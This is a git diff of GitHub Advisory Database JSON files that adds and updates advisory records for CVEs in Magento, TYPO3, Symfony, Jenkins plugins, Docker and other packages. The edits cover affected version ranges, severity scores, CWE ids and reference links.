a/advisories/github-reviewed/2022/05/GHSA-r68f-45jg-64m6/GHSA-r68f-45jg-64m6.json b/advisories/github-reviewed/2022/05/GHSA-r68f-45jg-64m6/GHSA-r68f-45jg-64m6.json index eff060e3141fd..ace82a7bf4593 100644 --- a/advisories/github-reviewed/2022/05/GHSA-r68f-45jg-64m6/GHSA-r68f-45jg-64m6.json +++ b/advisories/github-reviewed/2022/05/GHSA-r68f-45jg-64m6/GHSA-r68f-45jg-64m6.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7927" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7927.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-r6fv-56gp-j3r4/GHSA-r6fv-56gp-j3r4.json b/advisories/github-reviewed/2022/05/GHSA-r6fv-56gp-j3r4/GHSA-r6fv-56gp-j3r4.json index b068f65e8862d..6e0cc9664a11d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-r6fv-56gp-j3r4/GHSA-r6fv-56gp-j3r4.json +++ b/advisories/github-reviewed/2022/05/GHSA-r6fv-56gp-j3r4/GHSA-r6fv-56gp-j3r4.json @@ -25,17 +25,14 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "8.3.0" + "introduced": "8.0.0" }, { "fixed": "8.7.27" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 8.7.26" - } + ] }, { "package": { @@ -54,10 +51,45 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.7" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.27" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.8" + } + ] + } + ] } ], "references": [ @@ -65,6 +97,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12748" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2019-12748.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2019-12748.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3-CMS/core" @@ -73,6 +113,10 @@ "type": "WEB", "url": "https://typo3.org/cms/release-news/typo3-8-release-notes/" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-015" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-015/" diff --git a/advisories/github-reviewed/2022/05/GHSA-r7p7-qr7p-2rrf/GHSA-r7p7-qr7p-2rrf.json b/advisories/github-reviewed/2022/05/GHSA-r7p7-qr7p-2rrf/GHSA-r7p7-qr7p-2rrf.json index 993fce3845fe0..bddb618b53d92 100644 --- a/advisories/github-reviewed/2022/05/GHSA-r7p7-qr7p-2rrf/GHSA-r7p7-qr7p-2rrf.json +++ b/advisories/github-reviewed/2022/05/GHSA-r7p7-qr7p-2rrf/GHSA-r7p7-qr7p-2rrf.json @@ -90,6 +90,158 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.2.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.2.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] } ], "references": [ @@ -97,6 +249,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16652" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2017-16652.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2017-16652.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2017-16652.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -108,6 +272,10 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2017-16652-open-redirect-vulnerability-on-security-handlers" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2017-16652" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json b/advisories/github-reviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json new file mode 100644 index 0000000000000..0fe089c312245 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcrv-6r7r-rr7m", + "modified": "2024-01-30T21:43:50Z", + "published": "2022-05-13T01:17:45Z", + "aliases": [ + "CVE-2019-1003059" + ], + "summary": "Missing permission check in Jenkins FTP publisher Plugin", + "details": "A missing permission check in Jenkins FTP publisher Plugin in the FTPPublisher.DescriptorImpl#doLoginCheck method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:ftppublisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003059" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-974" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:43:50Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json b/advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json index ed88d54369ffd..cb90b6ab23db7 100644 --- a/advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json +++ b/advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json @@ -82,9 +82,25 @@ "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-admin/commit/6e6fa5c618b9dbf4cc0a56704834bfa1d5b0d18e" }, + { + "type": "WEB", + "url": "https://forum.silverstripe.org/c/releases" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-12205.yaml" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12205" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12205/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json b/advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json index c19e6d845f715..d090110897978 100644 --- a/advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json +++ b/advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-messaging" }, "ranges": [ { @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-messaging" }, "ranges": [ { @@ -62,6 +62,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22971" }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-framework/commit/dc2947c52df18d5e99cad03383f7d6ba13d031fd" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220616-0003/" diff --git a/advisories/github-reviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json b/advisories/github-reviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json new file mode 100644 index 0000000000000..0dc1a7e2a7527 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv74-mh27-4jpv", + "modified": "2024-02-01T21:49:45Z", + "published": "2022-05-24T17:36:09Z", + "aliases": [ + "CVE-2020-7790" + ], + "summary": "browsershot local file inclusion vulnerability", + "details": "This affects the package spatie/browsershot from 0.0.0. By specifying a URL in the file:// protocol an attacker is able to include arbitrary files in the resultant PDF.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "spatie/browsershot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.40.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7790" + }, + { + "type": "WEB", + "url": "https://github.com/spatie/browsershot/issues/441%23issue-735049731" + }, + { + "type": "WEB", + "url": "https://github.com/spatie/browsershot/pull/440" + }, + { + "type": "WEB", + "url": "https://github.com/spatie/browsershot/commit/8d4bcfb1ff609921007f3fc11d80fcdad35598ac" + }, + { + "type": "WEB", + "url": "https://snyk.io/vuln/SNYK-PHP-SPATIEBROWSERSHOT-1037064" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:49:45Z", + "nvd_published_at": "2020-12-11T11:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json b/advisories/github-reviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json new file mode 100644 index 0000000000000..64d1d64e80d8f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rxph-cq38-gm3g", + "modified": "2024-01-30T21:13:03Z", + "published": "2022-05-24T17:03:48Z", + "aliases": [ + "CVE-2019-16568" + ], + "summary": "Jenkins SCTMExecutor Plugin stores credentials in plain text ", + "details": "Jenkins SCTMExecutor Plugin 2.2 and earlier transmits previously configured service credentials in plain text as part of the global configuration, as well as individual jobs' configurations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins.sctmexecutor:SCTMExecutor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16568" + }, + { + "type": "WEB", + "url": "https://github.com/jenkins-infra/update-center2/pull/324" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1521" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:13:03Z", + "nvd_published_at": "2019-12-17T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json b/advisories/github-reviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json new file mode 100644 index 0000000000000..3fc3831ae234c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json @@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v2c9-9m8v-8jjm", + "modified": "2024-02-07T23:08:48Z", + "published": "2022-05-14T02:45:01Z", + "aliases": [ + "CVE-2010-1587" + ], + "summary": "Apache ActiveMQ Sensitive Information Disclosure via the Jetty ResourceHandler", + "details": "The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.activemq:activemq-web-console" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.3.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1587" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/activemq" + }, + { + "type": "WEB", + "url": "https://github.com/apache/activemq/tree/main/activemq-web-console/src/main/webapp" + }, + { + "type": "WEB", + "url": "https://issues.apache.org/activemq/browse/AMQ-2700" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100426064914/http://www.vupen.com/english/advisories/2010/0979" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100702082040/http://secunia.com/advisories/39567" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150314050810/http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0278.html" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228044456/http://www.securityfocus.com/bid/39636" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20201208002259/http://www.securityfocus.com/archive/1/510896/100/0/threaded" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:08:47Z", + "nvd_published_at": "2010-04-28T22:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json b/advisories/github-reviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json new file mode 100644 index 0000000000000..bafbf0fbd39aa --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json @@ -0,0 +1,90 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v2cv-wwxq-qq97", + "modified": "2024-02-01T21:22:37Z", + "published": "2022-05-24T16:51:39Z", + "aliases": [ + "CVE-2019-14271" + ], + "summary": "Moby Docker cp broken with debian containers", + "details": "In Docker 19.03.x before 19.03.1 linked against the GNU C Library (aka glibc), code injection can occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the container.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "19.03.0" + }, + { + "fixed": "19.03.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14271" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/issues/39449" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/pull/39612" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/11e48badcb67554b3d795241855028f28d244545" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/fa8dd90ceb7bcb9d554d27e0b9087ab83e54bd2b" + }, + { + "type": "WEB", + "url": "https://docs.docker.com/engine/release-notes/" + }, + { + "type": "WEB", + "url": "https://seclists.org/bugtraq/2019/Sep/21" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20190828-0003/" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2019/dsa-4521" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-665", + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:22:37Z", + "nvd_published_at": "2019-07-29T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-v59p-p692-v382/GHSA-v59p-p692-v382.json b/advisories/github-reviewed/2022/05/GHSA-v59p-p692-v382/GHSA-v59p-p692-v382.json index d5d2778de5c98..cf3a13573d020 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v59p-p692-v382/GHSA-v59p-p692-v382.json +++ b/advisories/github-reviewed/2022/05/GHSA-v59p-p692-v382/GHSA-v59p-p692-v382.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zend-db" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zend-db" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.5" + } + ] + } + ] } ], "references": [ @@ -67,6 +105,14 @@ "type": "WEB", "url": "https://framework.zend.com/security/advisory/ZF2015-02" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-db/CVE-2015-0270.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-0270.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/zendframework/zendframework" diff --git a/advisories/github-reviewed/2022/05/GHSA-v6xv-rmqc-wcc8/GHSA-v6xv-rmqc-wcc8.json b/advisories/github-reviewed/2022/05/GHSA-v6xv-rmqc-wcc8/GHSA-v6xv-rmqc-wcc8.json index 64ec19f4704c3..8a55febeb2710 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v6xv-rmqc-wcc8/GHSA-v6xv-rmqc-wcc8.json +++ b/advisories/github-reviewed/2022/05/GHSA-v6xv-rmqc-wcc8/GHSA-v6xv-rmqc-wcc8.json @@ -29,10 +29,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 4.5.38" - } + ] }, { "package": { @@ -51,10 +48,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.2.8" - } + ] }, { "package": { @@ -73,10 +67,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 7.0.1" - } + ] } ], "references": [ @@ -84,6 +75,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9508" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2014-9508.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2014-003" + }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2016-08/msg00106.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-v7mh-3jgf-r26c/GHSA-v7mh-3jgf-r26c.json b/advisories/github-reviewed/2022/05/GHSA-v7mh-3jgf-r26c/GHSA-v7mh-3jgf-r26c.json index 2eee4dbdf1f10..31ba698f650ea 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v7mh-3jgf-r26c/GHSA-v7mh-3jgf-r26c.json +++ b/advisories/github-reviewed/2022/05/GHSA-v7mh-3jgf-r26c/GHSA-v7mh-3jgf-r26c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v7mh-3jgf-r26c", - "modified": "2023-02-08T17:56:11Z", + "modified": "2024-02-06T16:02:43Z", "published": "2022-05-17T01:42:16Z", "aliases": [ "CVE-2012-4406" @@ -9,7 +9,10 @@ "summary": "OpenStack Object Storage (swift) Code Injection vulnerability", "details": "OpenStack Object Storage (swift) before 1.7.0 uses the loads function in the pickle Python module unsafely when storing and loading metadata in memcached, which allows remote attackers to execute arbitrary code via a crafted pickle object.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -104,9 +107,10 @@ ], "database_specific": { "cwe_ids": [ + "CWE-502", "CWE-94" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2023-02-08T17:56:11Z", "nvd_published_at": "2012-10-22T23:55:00Z" diff --git a/advisories/github-reviewed/2022/05/GHSA-v882-949x-6v28/GHSA-v882-949x-6v28.json b/advisories/github-reviewed/2022/05/GHSA-v882-949x-6v28/GHSA-v882-949x-6v28.json index a7ffdf649c838..a3a6e1ef767d1 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v882-949x-6v28/GHSA-v882-949x-6v28.json +++ b/advisories/github-reviewed/2022/05/GHSA-v882-949x-6v28/GHSA-v882-949x-6v28.json @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/simplesamlphp/simplesamlphp/commit/b72c79e3070f930d758f5c269333d63ed7509e2e" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2017-12872.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00007.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-v8fg-p27h-mxjp/GHSA-v8fg-p27h-mxjp.json b/advisories/github-reviewed/2022/05/GHSA-v8fg-p27h-mxjp/GHSA-v8fg-p27h-mxjp.json index ff24b08f9060b..e54970e08c01a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v8fg-p27h-mxjp/GHSA-v8fg-p27h-mxjp.json +++ b/advisories/github-reviewed/2022/05/GHSA-v8fg-p27h-mxjp/GHSA-v8fg-p27h-mxjp.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8147" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8147.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-v99w-jxr4-w6mc/GHSA-v99w-jxr4-w6mc.json b/advisories/github-reviewed/2022/05/GHSA-v99w-jxr4-w6mc/GHSA-v99w-jxr4-w6mc.json index 1bafb8c4d3468..939c131bb133c 100644 --- a/advisories/github-reviewed/2022/05/GHSA-v99w-jxr4-w6mc/GHSA-v99w-jxr4-w6mc.json +++ b/advisories/github-reviewed/2022/05/GHSA-v99w-jxr4-w6mc/GHSA-v99w-jxr4-w6mc.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8117" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8117.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json b/advisories/github-reviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json new file mode 100644 index 0000000000000..9412c7577cff8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vc2v-34c4-vg9c", + "modified": "2024-01-30T22:00:30Z", + "published": "2022-05-13T01:17:42Z", + "aliases": [ + "CVE-2019-1003088" + ], + "summary": "Jenkins Fabric-beta-publisher Plugin stores credentials in plain text", + "details": "Jenkins Fabric Beta Publisher Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "egor-n:fabric-beta-publisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003088" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1043" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:00:21Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-vc74-c4m6-9979/GHSA-vc74-c4m6-9979.json b/advisories/github-reviewed/2022/05/GHSA-vc74-c4m6-9979/GHSA-vc74-c4m6-9979.json index 3f49eea355ed0..0509081766b67 100644 --- a/advisories/github-reviewed/2022/05/GHSA-vc74-c4m6-9979/GHSA-vc74-c4m6-9979.json +++ b/advisories/github-reviewed/2022/05/GHSA-vc74-c4m6-9979/GHSA-vc74-c4m6-9979.json @@ -12,6 +12,44 @@ ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "neos/flow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.0" + }, + { + "fixed": "1.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "neos/flow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -22,7 +60,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.1" + "introduced": "1.1.0" }, { "fixed": "1.1.1" @@ -41,7 +79,7 @@ 